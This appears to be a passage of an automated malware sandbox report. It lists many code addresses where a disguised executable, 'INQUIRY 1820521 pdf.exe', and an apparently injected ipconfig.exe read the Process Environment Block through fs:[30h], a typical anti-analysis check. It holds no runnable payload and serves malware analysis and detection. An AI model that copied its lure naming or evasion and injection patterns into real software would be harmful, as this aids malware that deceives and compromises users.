          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]9_2_0156FD9B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]9_2_0156FD9B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015635A1 mov eax, dword ptr fs:[00000030h]9_2_015635A1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]9_2_015CC450
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]9_2_015CC450
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A44B mov eax, dword ptr fs:[00000030h]9_2_0156A44B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155746D mov eax, dword ptr fs:[00000030h]9_2_0155746D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156BC2C mov eax, dword ptr fs:[00000030h]9_2_0156BC2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F14FB mov eax, dword ptr fs:[00000030h]9_2_015F14FB
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608CD6 mov eax, dword ptr fs:[00000030h]9_2_01608CD6
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154849B mov eax, dword ptr fs:[00000030h]9_2_0154849B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608F6A mov eax, dword ptr fs:[00000030h]9_2_01608F6A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154EF40 mov eax, dword ptr fs:[00000030h]9_2_0154EF40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154FF60 mov eax, dword ptr fs:[00000030h]9_2_0154FF60
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155F716 mov eax, dword ptr fs:[00000030h]9_2_0155F716
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]9_2_015CFF10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]9_2_015CFF10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]9_2_0156A70E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]9_2_0156A70E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156E730 mov eax, dword ptr fs:[00000030h]9_2_0156E730
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]9_2_0160070D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]9_2_0160070D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]9_2_01534F2E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]9_2_01534F2E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015737F5 mov eax, dword ptr fs:[00000030h]9_2_015737F5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01548794 mov eax, dword ptr fs:[00000030h]9_2_01548794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]9_2_015FAE44
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]9_2_015FAE44
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154766D mov eax, dword ptr fs:[00000030h]9_2_0154766D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]9_2_0156A61C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]9_2_0156A61C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]9_2_0153C600
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]9_2_0153C600
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]9_2_0153C600
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01568E00 mov eax, dword ptr fs:[00000030h]9_2_01568E00
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1608 mov eax, dword ptr fs:[00000030h]9_2_015F1608
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EFE3F mov eax, dword ptr fs:[00000030h]9_2_015EFE3F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153E620 mov eax, dword ptr fs:[00000030h]9_2_0153E620
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01578EC7 mov eax, dword ptr fs:[00000030h]9_2_01578EC7
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015636CC mov eax, dword ptr fs:[00000030h]9_2_015636CC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EFEC0 mov eax, dword ptr fs:[00000030h]9_2_015EFEC0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608ED6 mov eax, dword ptr fs:[00000030h]9_2_01608ED6
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015616E0 mov ecx, dword ptr fs:[00000030h]9_2_015616E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015476E2 mov eax, dword ptr fs:[00000030h]9_2_015476E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]9_2_01600EA5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]9_2_01600EA5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]9_2_01600EA5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CFE87 mov eax, dword ptr fs:[00000030h]9_2_015CFE87
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B46A7 mov eax, dword ptr fs:[00000030h]9_2_015B46A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]16_2_03274F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]16_2_03274F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AE730 mov eax, dword ptr fs:[00000030h]16_2_032AE730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]16_2_0330FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]16_2_0330FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]16_2_032AA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]16_2_032AA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333131B mov eax, dword ptr fs:[00000030h]16_2_0333131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]16_2_0334070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]16_2_0334070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329F716 mov eax, dword ptr fs:[00000030h]16_2_0329F716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327DB60 mov ecx, dword ptr fs:[00000030h]16_2_0327DB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328FF60 mov eax, dword ptr fs:[00000030h]16_2_0328FF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]16_2_032A3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]16_2_032A3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03348F6A mov eax, dword ptr fs:[00000030h]16_2_03348F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327DB40 mov eax, dword ptr fs:[00000030h]16_2_0327DB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328EF40 mov eax, dword ptr fs:[00000030h]16_2_0328EF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03348B58 mov eax, dword ptr fs:[00000030h]16_2_03348B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327F358 mov eax, dword ptr fs:[00000030h]16_2_0327F358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]16_2_032A4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]16_2_032A4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]16_2_032A4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03345BA5 mov eax, dword ptr fs:[00000030h]16_2_03345BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]16_2_03281B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]16_2_03281B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0332D380 mov ecx, dword ptr fs:[00000030h]16_2_0332D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333138A mov eax, dword ptr fs:[00000030h]16_2_0333138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AB390 mov eax, dword ptr fs:[00000030h]16_2_032AB390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]16_2_032F7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]16_2_032F7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]16_2_032F7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03288794 mov eax, dword ptr fs:[00000030h]16_2_03288794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2397 mov eax, dword ptr fs:[00000030h]16_2_032A2397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329DBE9 mov eax, dword ptr fs:[00000030h]16_2_0329DBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]16_2_032A03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B37F5 mov eax, dword ptr fs:[00000030h]16_2_032B37F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]16_2_032F53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]16_2_032F53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327E620 mov eax, dword ptr fs:[00000030h]16_2_0327E620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]16_2_032B4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]16_2_032B4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0332FE3F mov eax, dword ptr fs:[00000030h]16_2_0332FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03288A0A mov eax, dword ptr fs:[00000030h]16_2_03288A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]16_2_0327C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]16_2_0327C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]16_2_0327C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A8E00 mov eax, dword ptr fs:[00000030h]16_2_032A8E00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]16_2_0327AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]16_2_0327AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03293A1C mov eax, dword ptr fs:[00000030h]16_2_03293A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]16_2_032AA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]16_2_032AA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]16_2_03275210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03275210 mov ecx, dword ptr fs:[00000030h]16_2_03275210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]16_2_03275210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]16_2_03275210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331608 mov eax, dword ptr fs:[00000030h]16_2_03331608
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328766D mov eax, dword ptr fs:[00000030h]16_2_0328766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B927A mov eax, dword ptr fs:[00000030h]16_2_032B927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]16_2_0332B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]16_2_0332B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03348A62 mov eax, dword ptr fs:[00000030h]16_2_03348A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]16_2_0329AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]16_2_0329AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]16_2_0329AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]16_2_0329AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]16_2_0329AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333EA55 mov eax, dword ptr fs:[00000030h]16_2_0333EA55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]16_2_03279240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]16_2_03279240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]16_2_03279240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]16_2_03279240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03304257 mov eax, dword ptr fs:[00000030h]16_2_03304257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]16_2_03287E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]16_2_032752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]16_2_032752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]16_2_032752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]16_2_032752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]16_2_032752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F46A7 mov eax, dword ptr fs:[00000030h]16_2_032F46A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]16_2_03340EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]16_2_03340EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]16_2_03340EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]16_2_0328AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]16_2_0328AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AFAB0 mov eax, dword ptr fs:[00000030h]16_2_032AFAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0330FE87 mov eax, dword ptr fs:[00000030h]16_2_0330FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]16_2_032AD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]16_2_032AD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A16E0 mov ecx, dword ptr fs:[00000030h]16_2_032A16E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032876E2 mov eax, dword ptr fs:[00000030h]16_2_032876E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2AE4 mov eax, dword ptr fs:[00000030h]16_2_032A2AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2ACB mov eax, dword ptr fs:[00000030h]16_2_032A2ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03348ED6 mov eax, dword ptr fs:[00000030h]16_2_03348ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A36CC mov eax, dword ptr fs:[00000030h]16_2_032A36CC
